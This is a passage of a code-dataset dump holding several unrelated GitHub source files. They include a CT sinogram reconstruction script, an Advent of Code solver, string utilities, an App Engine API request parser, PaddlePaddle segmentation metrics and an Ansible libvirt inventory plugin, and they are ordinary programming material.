zeros of length 329\r\n \r\n # Create hamming window for N/2 elements\r\n for i in range(N//2):\r\n hamming[i] = (c+((1-c)*math.cos(math.pi*(i/((N/2)-1)))))\r\n # Multiply Hamming window by corresponding Ramp filter values\r\n for i in range(1,(N//2)):\r\n window_filter[(i*2)-1] = ramp[(i*2)-1]*hamming[i]\r\n window_filter[i*2] = ramp[i*2]*hamming[i]\r\n \r\n window_filter[-1] = ramp[-1]*hamming[-1]\r\n \r\n # return input channel times windowed ramp filter\r\n return ch_proj*window_filter\r\n\r\n# Applies Hann windowed ramp filter to channel passed in\r\ndef hann_window(ch_proj):\r\n ramp = np.floor(np.arange(0.5, ch_proj.shape[1]//2 + 0.1, 0.5))\r\n window_filter = ramp\r\n \r\n # Initialise variables for hamming window\r\n c = 0.5\r\n N = ch_proj.shape[1] # length of input channel = 658\r\n hann = np.zeros(N//2) # Array of zeros of length 329\r\n \r\n # Create Hann window for N/2 elements\r\n for i in range(N//2):\r\n hann[i] = (c+(c*math.cos(math.pi*(i/((N/2)-1)))))\r\n \r\n # Multiplies Hann window values by corresponding ramp filter values\r\n for i in range(1,(N//2),1):\r\n window_filter[(i*2)-1] = ramp[(i*2)-1]*hann[i]\r\n window_filter[i*2] = ramp[i*2]*hann[i]\r\n \r\n window_filter[-1] = ramp[-1]*hann[-1]\r\n\r\n # return input channel times windowed ramp filter\r\n return ch_proj*window_filter\r\n\r\n# Return channel using inverse fast fourier transform\r\n# to the spatial domain\r\ndef inverse_fft(channel):\r\n return fft.irfft(channel, axis = 1)\r\n\r\n# Returns the reconstructed image \r\n# by back projecting the filtered projections\r\ndef back_projection(channel):\r\n \r\n #laminogram equal to images height\r\n laminogram = np.zeros((channel.shape[1],channel.shape[1]))\r\n dTheta = 180.0 / channel.shape[0]\r\n \r\n #rotate image and plot values on linogram\r\n for i in range(channel.shape[0]):\r\n arr = np.tile(channel[i],(channel.shape[1],1))\r\n temp = rotate(arr, dTheta*i)\r\n laminogram += temp\r\n return laminogram\r\n\r\n# Crops image into square\r\ndef crop(channel):\r\n #square length = diameter/square root(2)\r\n side = int(channel.shape[0]/math.sqrt(2))\r\n new_ch = []\r\n \r\n #width start and end points\r\n s_width = int((channel.shape[0]/2)-side/2)\r\n e_width = int((channel.shape[0]/2)+side/2)\r\n\r\n #height start and end points\r\n s_height = int((channel.shape[1]/2)-side/2)\r\n e_height = int((channel.shape[1]/2)+side/2)\r\n\r\n #cropping channel \r\n for i in channel[s_width:e_width]:\r\n new_ch.append(i[s_height:e_height])\r\n new_ch = np.reshape(new_ch,(side,side))\r\n return new_ch\r\n\r\n# Rescales channel to 8bit channel\r\ndef ch_rescale(channel):\r\n cr_ch = crop(channel)\r\n chi,clo = cr_ch.max(),cr_ch.min()\r\n chnorm = 255*(cr_ch-clo)/(chi-clo)\r\n ch8bit = np.floor(chnorm).astype('uint8')\r\n return ch8bit\r\n\r\n# Applies inverse fast fourier transform and back projection to each channel\r\n# input to the function. Channels then scaled and cropped.\r\ndef reconstruction(r_cha, g_cha, b_cha, filter_type):\r\n #Converting colour channels to spacial domain using inverse FFT\r\n spatial_dom_red = inverse_fft(r_cha)\r\n spatial_dom_green = inverse_fft(g_cha)\r\n spatial_dom_blue = inverse_fft(b_cha)\r\n \r\n #Back projecting colour channels\r\n recon_im_red = back_projection(spatial_dom_red)\r\n recon_im_green = back_projection(spatial_dom_green)\r\n recon_im_blue = back_projection(spatial_dom_blue)\r\n \r\n # Display back projected images including edge artifacts\r\n imutils.imshow(recon_im_red, title = \"Red channel backprojections for \" + filter_type )\r\n imutils.imshow(recon_im_green, title = \"Green channel backprojections for \" + filter_type)\r\n imutils.imshow(recon_im_blue, title = \"Blue channel backprojections for \" + filter_type) \r\n \r\n #Rescaling channels to 8 bit and cropping image\r\n red_scaled= ch_rescale(recon_im_red)\r\n green_scaled= ch_rescale(recon_im_green)\r\n blue_scaled= ch_rescale(recon_im_blue)\r\n \r\n return red_scaled, green_scaled, blue_scaled\r\n\r\n# Calculates the mean squared error between the two input images. Images\r\n# must be the same size\r\ndef mse(imageA, imageB):\r\n\t# the 'Mean Squared Error' between the two images is the\r\n\t# sum of the squared difference between the two images;\r\n\terr = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\r\n\terr /= float(imageA.shape[0] * imageA.shape[1])\r\n\t\r\n\t# return the MSE, the lower the error, the more similar\r\n\treturn err\r\n\r\n## Statements\r\n##Import coloured image (RGB)\r\nprint(\"Original Sinogram\")\r\nsinogram = imutils.imread('sinogram.png',greyscale = False)\r\nimutils.imshow(sinogram, title = \"Original Sinogram image\")\r\nimageio.imwrite('originalSinogramImage.png', sinogram)\r\n\r\n##splitting the image into 3 colours\r\nred = sinogram[:,:,0]\r\ngreen = sinogram[:,:,1]\r\nblue = sinogram[:,:,2]\r\n\r\n#Reshaping the colours to give rows\r\nred = np.reshape(red,(360,658))\r\ngreen = np.reshape(green,(360,658))\r\nblue = np.reshape(blue,(360,658))\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel without any filtering\r\n#################################################################\r\n\r\nprint(\"Reconstruction with no filtering\")\r\nunfiltered_red = back_projection(red)\r\nunfiltered_green = back_projection(green)\r\nunfiltered_blue = back_projection(blue)\r\n\r\n# Display back projected images including edge artifacts\r\nimutils.imshow(unfiltered_red, title = \"Red channel Backprojection without filtering\")\r\nimutils.imshow(unfiltered_green, title = \"Green channel Backprojection without filtering\")\r\nimutils.imshow(unfiltered_blue, title = \"Blue channel Backprojection without filtering\") \r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled = ch_rescale(unfiltered_red)\r\ngreen_rescaled = ch_rescale(unfiltered_green)\r\nblue_rescaled = ch_rescale(unfiltered_blue)\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel without filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Blue channel without filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel without filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Reconstructed coloured image\\n\\n\")\r\nimage = np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image, title = \"Reconstruction without filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with simple rampfiltering\r\n#################################################################\r\n\r\nprint(\"Performing simple ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Ramp channels\r\nred_filt = ramp_filter(red_fft)\r\ngreen_filt = ramp_filter(green_fft)\r\nblue_filt = ramp_filter(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"ramp filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel ramp filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel rampfiltering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel ramp filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Simple ramp filtered reconstruction complete.\\n\\n\")\r\nimage_ramp=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_ramp, title = \"Reconstruction with ramp filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with Hamming window filter\r\n#################################################################\r\n\r\nprint(\"Performing Hamming window ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Hamming window channels\r\nred_filt = hamming_window(red_fft)\r\ngreen_filt = hamming_window(green_fft)\r\nblue_filt = hamming_window(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"Hamming windowed filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel Hamming window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel: Hamming window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel Hamming window filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Hamming window ramp filtered reconstruction complete.\\n\\n\")\r\nimage_hamming=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_hamming, title = \"Reconstruction with Hamming windowed ramp filtering\")\r\n\r\n#################################################################\r\n#Reconstruction of each colour channel with Hann window filter\r\n#################################################################\r\n\r\nprint(\"Performing Hann window ramp filtered reconstruction\")\r\n#Convert channels to Frequency domain\r\nred_fft = ch_fft(red)\r\ngreen_fft = ch_fft(green)\r\nblue_fft = ch_fft(blue)\r\n\r\n#Hann window channels\r\nred_filt = hann_window(red_fft)\r\ngreen_filt = hann_window(green_fft)\r\nblue_filt = hann_window(blue_fft)\r\n\r\n#Rescaling channels to 8 bit and cropping image\r\nred_rescaled, green_rescaled, blue_rescaled = reconstruction(red_filt, green_filt, blue_filt, \"Hann windowed filter\")\r\n\r\nimutils.imshow(red_rescaled, title = \"Red channel Hann window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(green_rescaled, title = \"Green channel Hann window filtering, cropped and scaled to 8-bit\")\r\nimutils.imshow(blue_rescaled, title = \"Blue channel Hann window filtering, cropped and scaled to 8-bit\")\r\n\r\n#Reconstruct all channels to one image\r\nprint(\"Hann window ramp filtered reconstruction complete.\\n\\n\")\r\nimage_hann=np.dstack((red_rescaled,green_rescaled,blue_rescaled))\r\nimutils.imshow(image_hann, title = \"Reconstruction with Hann windowed ramp filtering\")\r\n\r\n# Calculate the mean squared error and display absolute difference between Hamming and Hann\r\nprint(\"Mean squared error between Hamming and Hann windowed ramp filters: \")\r\nprint(mse(image_hamming, image_hann))\r\nimage_diff = abs(image_hamming - image_hann)\r\nimutils.imshow(image_diff, title = \"Pixels differences between Hamming and Hann filter reconstruction\")\r\n","repo_name":"RaymondMcCreesh/Sinogram","sub_path":"Sinogram.py","file_name":"Sinogram.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11138538087","text":"\"\"\"\nWrite a Python program to draw a line using given axis values\n with suitable label in the x axis , y axis and a title\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nX = range(1, 25)\nY = [value ** 2 for value in X]\n\nprint(\"Values of X:\")\nprint(*range(1,25))\n\nprint(\"Values of Y (Sqaure of X):\")\nprint(Y)\n\nplt.plot(X, Y, color = 'Red', linewidth = 2, linestyle = 'dotted')\n\nplt.xlabel('x - axis')\nplt.ylabel('y - axis')\nplt.title('Draw a line.')\n\nplt.show()","repo_name":"Vijendrapratap/Machine-Learning","sub_path":"Week4/Matplotlib/Matplotlib/2.WAP to draw a line using given axis values with suitable label in the x axis , y axis and a title.py","file_name":"2.WAP to draw a line using given axis values with suitable label in the x axis , y axis and a title.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71034767844","text":"\"\"\"--- Day 5: Supply Stacks ---\nThe expedition can depart as soon as the final supplies have been unloaded from the ships. Supplies are stored in stacks of marked crates, but because the needed supplies are buried under many other crates, the crates need to be rearranged.\n\nThe ship has a giant cargo crane capable of moving crates between stacks. To ensure none of the crates get crushed or fall over, the crane operator will rearrange them in a series of carefully-planned steps. After the crates are rearranged, the desired crates will be at the top of each stack.\n\nThe Elves don't want to interrupt the crane operator during this delicate procedure, but they forgot to ask her which crate will end up where, and they want to be ready to unload them as soon as possible so they can embark.\n\nThey do, however, have a drawing of the starting stacks of crates and the rearrangement procedure (your puzzle input). For example:\n\n [D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \n\nmove 1 from 2 to 1\nmove 3 from 1 to 3\nmove 2 from 2 to 1\nmove 1 from 1 to 2\nIn this example, there are three stacks of crates. Stack 1 contains two crates: crate Z is on the bottom, and crate N is on top. Stack 2 contains three crates; from bottom to top, they are crates M, C, and D. Finally, stack 3 contains a single crate, P.\n\nThen, the rearrangement procedure is given. In each step of the procedure, a quantity of crates is moved from one stack to a different stack. In the first step of the above rearrangement procedure, one crate is moved from stack 2 to stack 1, resulting in this configuration:\n\n[D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nIn the second step, three crates are moved from stack 1 to stack 3. Crates are moved one at a time, so the first crate to be moved (D) ends up below the second and third crates:\n\n [Z]\n [N]\n [C] [D]\n [M] [P]\n 1 2 3\nThen, both crates are moved from stack 2 to stack 1. Again, because crates are moved one at a time, crate C ends up below crate M:\n\n [Z]\n [N]\n[M] [D]\n[C] [P]\n 1 2 3\nFinally, one crate is moved from stack 1 to stack 2:\n\n [Z]\n [N]\n [D]\n[C] [M] [P]\n 1 2 3\nThe Elves just need to know which crate will end up on top of each stack; in this example, the top crates are C in stack 1, M in stack 2, and Z in stack 3, so you should combine these together and give the Elves the message CMZ.\"\"\"\n\n# change to directory of this file\nimport os\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# read input\nwith open('input.txt') as f:\n\tinput = f.read()\n\n# split input into initial state and instructions\ninitial_state, instructions = input.split('\\n\\n')\n\n# parse initial state\nstacks = []\n# for each line but the last one\nfor line in initial_state.splitlines()[:-1]:\n\t# iterate over characters and detect current stack using current index of line\n\tstack = []\n\n\t# start index = 1\n\ti = 1\n\t# iterate to end of line - 1 from i\n\twhile i < len(line) - 1:\n\t\t# get current stack\n\t\tcurrent_stack = (i - 1) // 4\n\n\t\t# if current stack is not in stacks\n\t\tif current_stack >= len(stacks):\n\t\t\t# add new stack to stacks\n\t\t\tstacks.append([])\n\n\t\t# if character is not a space\n\t\tif line[i] != ' ':\n\n\t\t\t# add character to current stack\n\t\t\tstacks[current_stack].append(line[i])\n\n\t\ti += 4\n\n# print initial state\nprint('Initial state:')\nfor stack in stacks:\n\tprint(stack)\n\n\n# parse instructions (amount, from_number, to_number)\ninstructions = [(instruction.split()[1::2]) for instruction in instructions.splitlines()]\n\n# print instructions\nprint('Instructions:')\nfor instruction in instructions:\n\tprint(instruction)\n\n# execute instructions\nfor instruction in instructions:\n\t# get amount, from_number and to_number\n\tamount, from_number, to_number = instruction\n\n\t# convert to int\n\tamount = int(amount)\n\tfrom_number = int(from_number)\n\tto_number = int(to_number)\n\n\t# get crates from the stack at from_number - 1 and remove them from the stack\n\tcrates = stacks[from_number - 1][:amount]\n\n\t# remove crates from stack at from_number - 1\n\tstacks[from_number - 1] = stacks[from_number - 1][amount:]\n\tprint(stacks[from_number - 1])\n\t\n\t# add crates to to_number - 1 stack by adding them to the beginning of the stack but reversed\n\tstacks[to_number - 1] = crates[::-1] + stacks[to_number - 1]\n\n# # print final state\n# print('Final state:')\n# for stack in stacks:\n# \tprint(stack)\n\n# print result\nprint('Result:')\nprint(''.join([stack[0] for stack in stacks]))","repo_name":"Lefted/Advent-of-Code-2022","sub_path":"5/5a.py","file_name":"5a.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4002379659","text":"\r\nimport re\r\n\r\n_iterativePartRgx = re.compile('_\\d+_(?=\\D)|\\d+$')\r\n_trailingNumRgx = re.compile('([0-9]+)$')\r\n_interBracketsRgx = re.compile(r'{([^{}]*?)}')\r\n\r\n#-------------------------------------------------------------------------------\r\n# strings manipulation utilities\r\n#-------------------------------------------------------------------------------\r\n\r\ndef upperFirst(w):\r\n return w[0].upper() + w[1:]\r\n\r\ndef lowerFirst(w):\r\n return w[0].lower() + w[1:]\r\n\r\ndef wordSplit(s, digits=False):\r\n '''\r\n Author: http://stackoverflow.com/users/1850574/jdavidls\r\n \r\n A very 'low level' implementation of a simple state machine (bitfield state machine).\r\n This is not an elegant method and possibly the most anti-pythonic mode to resolve this. \r\n However, 're' module also implements a too complex state machine to resolve this simple task.\r\n \r\n state bits:\r\n 0: no yields\r\n 1: lower yields\r\n 2: lower yields - 1\r\n 4: upper yields\r\n 8: digit yields\r\n 16: other yields\r\n 32 : upper sequence mark\r\n '''\r\n\r\n digit_state_test = 8 if digits else 0\r\n si, ci, state = 0, 0, 0 # start_index, current_index\r\n\r\n for c in s:\r\n\r\n if c.islower():\r\n if state & 1:\r\n yield s[si:ci]\r\n si = ci\r\n elif state & 2:\r\n yield s[si:ci - 1]\r\n si = ci - 1\r\n state = 4 | 8 | 16\r\n ci += 1\r\n\r\n elif c.isupper():\r\n if state & 4:\r\n yield s[si:ci]\r\n si = ci\r\n if state & 32:\r\n state = 2 | 8 | 16 | 32\r\n else:\r\n state = 8 | 16 | 32\r\n\r\n ci += 1\r\n\r\n elif c.isdigit():\r\n if state & digit_state_test:\r\n yield s[si:ci]\r\n si = ci\r\n state = 1 | 4 | 16\r\n ci += 1\r\n\r\n else:\r\n if state & 16:\r\n yield s[si:ci]\r\n state = 0\r\n ci += 1 # eat ci\r\n si = ci\r\n # print(' : ', c, bin(state))\r\n if state:\r\n yield s[si:ci]\r\n\r\ndef labelify(s):\r\n return \" \".join((upperFirst(w) for w in wordSplit(s)))\r\n\r\ndef underJoin(iterable):\r\n\r\n if isinstance(iterable, basestring):\r\n return iterable\r\n\r\n return \"_\".join(iterable)\r\n\r\ndef camelJoin(iterable):\r\n\r\n if isinstance(iterable, basestring):\r\n return iterable\r\n\r\n return \"\".join((upperFirst(w) if i > 0 else w.lower() for i, w in enumerate(iterable)))\r\n\r\n\r\ndef findFields(s):\r\n return _interBracketsRgx.findall(s)\r\n\r\ndef padded(i, padding=3):\r\n return \"{0:0{1}d}\".format(i, padding)\r\n\r\ndef getNumPart(in_sName, **kwargs):\r\n\r\n bAsStr = kwargs.get(\"asString\", False)\r\n sPart = kwargs.get(\"part\", \"iterative\")\r\n\r\n if sPart == \"trailing\":\r\n rgx = _trailingNumRgx\r\n elif sPart == \"iterative\":\r\n rgx = _iterativePartRgx\r\n else:\r\n raise ValueError('Invalid value for \"part\" kwarg : \"{0}\". \\\r\n Must be \"iterative\" or \"trailing\".'.format(sPart))\r\n\r\n try:\r\n sIter = rgx.findall(in_sName)[-1]\r\n except IndexError:\r\n return '' if bAsStr else 0\r\n\r\n sIter = sIter.strip('_')\r\n\r\n if bAsStr:\r\n return sIter\r\n else:\r\n return int(sIter)\r\n\r\ndef getIteration(in_sName, **kwargs):\r\n return getNumPart(in_sName, part=\"iterative\", **kwargs)\r\n\r\ndef getTrailingNum(in_sName, **kwargs):\r\n return getNumPart(in_sName, part=\"trailing\", **kwargs)\r\n\r\n\r\n","repo_name":"sebcourtois/cg-pypeline-toolkit","sub_path":"pytk/util/strutils.py","file_name":"strutils.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72789728485","text":"# Faça um programa que receba um número.\n# Verifique se o número informado é par ou ímpar.\n# Exiba o resultado da seguinte maneira:\n\n# \tO número x é impar\n# ou\n# \tO número x é par\n\nnumero = int(input(\"Entre com um número: \"))\n\nif numero % 2 == 0:\n print(f\"O número {numero} é par!\")\nelse:\n print(f\"O número {numero} é ímpar!\")","repo_name":"TeoMeWhy/introducao-programacao-python","sub_path":"dia02/exercicios/ex1.8.py","file_name":"ex1.8.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"pt","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"12512929115","text":"from __future__ import with_statement\n\n# pylint: disable=g-bad-name\nimport copy\nimport json\nimport logging\nimport urllib\nimport urlparse\nimport zlib\n\nimport util\n\n\nclass ApiRequest(object):\n \"\"\"Simple data object representing an API request.\n\n Parses the request from environment variables into convenient pieces\n and stores them as members.\n \"\"\"\n def __init__(self, environ, base_paths=None):\n \"\"\"Constructor.\n\n Args:\n environ: An environ dict for the request as defined in PEP-333.\n\n Raises:\n ValueError: If the path for the request is invalid.\n \"\"\"\n self.headers = util.get_headers_from_environ(environ)\n self.http_method = environ['REQUEST_METHOD']\n self.url_scheme = environ['wsgi.url_scheme']\n self.server = environ['SERVER_NAME']\n self.port = environ['SERVER_PORT']\n self.path = environ['PATH_INFO']\n self.query = environ.get('QUERY_STRING')\n self.body = environ['wsgi.input'].read()\n if self.body and self.headers.get('CONTENT-ENCODING') == 'gzip':\n # Increasing wbits to 16 + MAX_WBITS is necessary to be able to decode\n # gzipped content (as opposed to zlib-encoded content).\n # If there's an error in the decompression, it could be due to another\n # part of the serving chain that already decompressed it without clearing\n # the header. If so, just ignore it and continue.\n try:\n self.body = zlib.decompress(self.body, 16 + zlib.MAX_WBITS)\n except zlib.error:\n pass\n self.source_ip = environ.get('REMOTE_ADDR')\n self.relative_url = self._reconstruct_relative_url(environ)\n\n if not base_paths:\n base_paths = set()\n elif isinstance(base_paths, list):\n base_paths = set(base_paths)\n\n # Find a base_path in the path\n for base_path in base_paths:\n if self.path.startswith(base_path):\n self.path = self.path[len(base_path):]\n self.base_path = base_path\n break\n else:\n raise ValueError('Invalid request path: %s' % self.path)\n\n if self.query:\n self.parameters = urlparse.parse_qs(self.query, keep_blank_values=True)\n else:\n self.parameters = {}\n self.body_json = self._process_req_body(self.body) if self.body else {}\n self.request_id = None\n\n # Check if it's a batch request. We'll only handle single-element batch\n # requests on the dev server (and we need to handle them because that's\n # what RPC and JS calls typically show up as). Pull the request out of the\n # list and record the fact that we're processing a batch.\n if isinstance(self.body_json, list):\n if len(self.body_json) != 1:\n logging.warning('Batch requests with more than 1 element aren\\'t '\n 'supported in devappserver2. Only the first element '\n 'will be handled. Found %d elements.',\n len(self.body_json))\n else:\n logging.info('Converting batch request to single request.')\n self.body_json = self.body_json[0]\n self.body = json.dumps(self.body_json)\n self._is_batch = True\n else:\n self._is_batch = False\n\n def _process_req_body(self, body):\n \"\"\"Process the body of the HTTP request.\n\n If the body is valid JSON, return the JSON as a dict.\n Else, convert the key=value format to a dict and return that.\n\n Args:\n body: The body of the HTTP request.\n \"\"\"\n try:\n return json.loads(body)\n except ValueError:\n return urlparse.parse_qs(body, keep_blank_values=True)\n\n def _reconstruct_relative_url(self, environ):\n \"\"\"Reconstruct the relative URL of this request.\n\n This is based on the URL reconstruction code in Python PEP 333:\n http://www.python.org/dev/peps/pep-0333/#url-reconstruction. Rebuild the\n URL from the pieces available in the environment.\n\n Args:\n environ: An environ dict for the request as defined in PEP-333.\n\n Returns:\n The portion of the URL from the request after the server and port.\n \"\"\"\n url = urllib.quote(environ.get('SCRIPT_NAME', ''))\n url += urllib.quote(environ.get('PATH_INFO', ''))\n if environ.get('QUERY_STRING'):\n url += '?' + environ['QUERY_STRING']\n return url\n\n def copy(self):\n return copy.deepcopy(self)\n\n def is_rpc(self):\n # Google's JsonRPC protocol creates a handler at /rpc for any Cloud\n # Endpoints API, with api name, version, and method name being in the\n # body of the request.\n # If the request is sent to /rpc, we will treat it as JsonRPC.\n # The client libraries for iOS's Objective C use RPC and not the REST\n # versions of the API.\n return self.path == 'rpc'\n\n def is_batch(self):\n return self._is_batch\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/third_party/google-endpoints/endpoints/api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"38382548653","text":"import numpy as np\nfrom paddle import fluid\nfrom paddle.fluid.dygraph import to_variable\n\n__all__ = [\"SegmentationMetrics\"]\n\n\nclass SegmentationMetrics(object):\n def __init__(self,\n ncls: int = 0,\n ignore_label: int = 0,\n eps: float = 1e-8):\n \"\"\"\n See https://arxiv.org/pdf/1704.06857.pdf.\n @param\n ncls: Range must be continuous.\n \"\"\"\n self.eps = eps\n self.ncls = ncls\n self.ignore_label = ignore_label\n\n def update(self, ncls, ignore_label):\n assert ncls >= 1 and ignore_label >= 0\n self.ncls = ncls\n self.ignore_label = ignore_label\n\n def __call__(self, predict: fluid.Variable, target: fluid.Variable):\n \"\"\"\n predict: [N, C, H, W]\n target: [N, H, W]\n \"\"\"\n\n # 1. check\n assert predict is not None and target is not None\n predict = fluid.layers.argmax(predict, axis=1)\n\n miou, out_wrong, out_correct = fluid.layers.mean_iou(\n predict, target, self.ncls)\n\n\n return miou, out_wrong, out_correct\n\n\nif __name__ == \"__main__\":\n\n np.random.seed(2020)\n\n xmin, ymin = 4, 5\n xmax, ymax = 12, 12\n\n n, c, h, w = 5, 8, 20, 20\n ignore_class = 0\n true_class = 6\n\n pred = np.random.normal(size=(n, c, h, w))\n pred_max = np.max(pred)\n\n target = np.random.randint(\n ignore_class+1, c, size=(n, h, w), dtype=np.int64)\n\n pred1 = pred.copy()\n # pred1[..., nd_range] = true_class\n pred1[..., true_class, ymin: ymax, xmin: xmax] = pred_max + 0.1\n target1 = target.copy()\n target1[..., ymin: ymax, xmin: xmax] = true_class\n\n pred2 = pred.copy()\n pred2[..., true_class, ymin: ymax, xmin: xmax] = pred_max + 0.1\n target2 = target.copy()\n target2[..., ymin: ymax, xmin: xmax] = c - true_class\n\n seg_metrics = SegmentationMetrics(c)\n\n with fluid.dygraph.guard():\n pred = to_variable(pred)\n target = to_variable(target)\n info = seg_metrics(pred, target)\n print(*info)\n\n pred = to_variable(pred1)\n target = to_variable(target1)\n info = seg_metrics(pred, target)\n print(*info)\n\n pred = to_variable(pred2)\n target = to_variable(target2)\n info = seg_metrics(pred, target)\n print(*info)\n","repo_name":"yangyangyangGen/Semantic_segmentation_baseline","sub_path":"undone/metrics_matrix_paddle.py","file_name":"metrics_matrix_paddle.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74292124644","text":"'''\n정수 A를 B로 바꾸려고 한다. 가능한 연산은 다음과 같은 두 가지이다.\n- 2를 곱한다.\n- 1을 수의 가장 오른쪽에 추가한다. \nA를 B로 바꾸는데 필요한 연산의 최솟값을 구해보자.\n'''\n\na,b = map(int, input().split())\ncnt = 1\nwhile b!=a:\n cnt+=1\n tmp=b\n if b%10 ==1:\n b//=10\n elif b%2==0:\n b//=2\n \n if tmp==b:\n print(-1)\n break\nelse:\n print(cnt)","repo_name":"MaiBoii/Algorithm_Study","sub_path":"CLASS4/16953_A->B.py","file_name":"16953_A->B.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12902831169","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = r'''\nname: libvirt\nplugin_type: inventory\nextends_documentation_fragment:\n - constructed\nshort_description: Libvirt inventory source\ndescription:\n - Get libvirt guests in an inventory source\nauthor:\n - Dave Olsthoorn \nversion_added: \"2.10\"\noptions:\n plugin:\n description: Token that ensures this is a source file for the 'libvirt' plugin.\n required: True\n choices: ['libvirt']\n uri:\n description: Libvirt Connection URI\n required: True\n type: str\n inventory_hostname:\n description: |\n What to register as the inventory hostname.\n If set to 'uuid' the uuid of the server will be used and a\n group will be created for the server name.\n If set to 'name' the name of the server will be used unless\n there are more than one server with the same name in which\n case the 'uuid' logic will be used.\n Default is to do 'name'\n type: string\n choices:\n - name\n - uuid\n default: \"name\"\nrequirements:\n - \"libvirt-python\"\n'''\n\nEXAMPLES = r'''\n# Connect to lxc host\nplugin: community.libvirt.libvirt\nuri: 'lxc:///'\n\n# Connect to qemu\nplugin: community.libvirt.libvirt\nuri: 'qemu:///system'\n'''\n\nfrom ansible.plugins.inventory import BaseInventoryPlugin, Constructable\nfrom ansible.errors import AnsibleError\n\ntry:\n import libvirt\nexcept ImportError:\n raise AnsibleError('the libvirt inventory plugin requires libvirt-python.')\n\n\nclass InventoryModule(BaseInventoryPlugin, Constructable):\n NAME = 'community.libvirt.libvirt'\n\n def parse(self, inventory, loader, path, cache=True):\n super(InventoryModule, self).parse(\n inventory,\n loader,\n path,\n cache=cache\n )\n\n config_data = self._read_config_data(path)\n\n # set _options from config data\n self._consume_options(config_data)\n\n uri = self.get_option('uri')\n if not uri:\n raise AnsibleError(\"hypervisor uri not given\")\n\n connection = libvirt.open(uri)\n if not connection:\n raise AnsibleError(\"hypervisor connection failure\")\n\n # TODO(daveol)\n # make using connection plugins optional\n connection_plugin = dict({\n 'LXC': 'community.libvirt.libvirt_lxc',\n 'QEMU': 'community.libvirt.libvirt_qemu'\n }).get(connection.getType())\n\n for server in connection.listAllDomains():\n inventory_hostname = dict({\n 'uuid': server.UUIDString(),\n 'name': server.name()\n }).get(\n self.get_option('inventory_hostname')\n )\n\n inventory_hostname_alias = dict({\n 'name': server.UUIDString(),\n 'uuid': server.name()\n }).get(\n self.get_option('inventory_hostname')\n )\n\n # TODO(daveol): Fix \"Invalid characters were found in group names\"\n # This warning is generated because of uuid's\n self.inventory.add_host(inventory_hostname)\n self.inventory.add_group(inventory_hostname_alias)\n self.inventory.add_child(inventory_hostname_alias, inventory_hostname)\n\n if connection_plugin is not None:\n self.inventory.set_variable(\n inventory_hostname,\n 'ansible_libvirt_uri',\n uri\n )\n self.inventory.set_variable(\n inventory_hostname,\n 'ansible_connection',\n connection_plugin\n )\n\n # Get variables for compose\n variables = self.inventory.hosts[inventory_hostname].get_vars()\n\n # Set composed variables\n self._set_composite_vars(\n self.get_option('compose'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n\n # Add host to composed groups\n 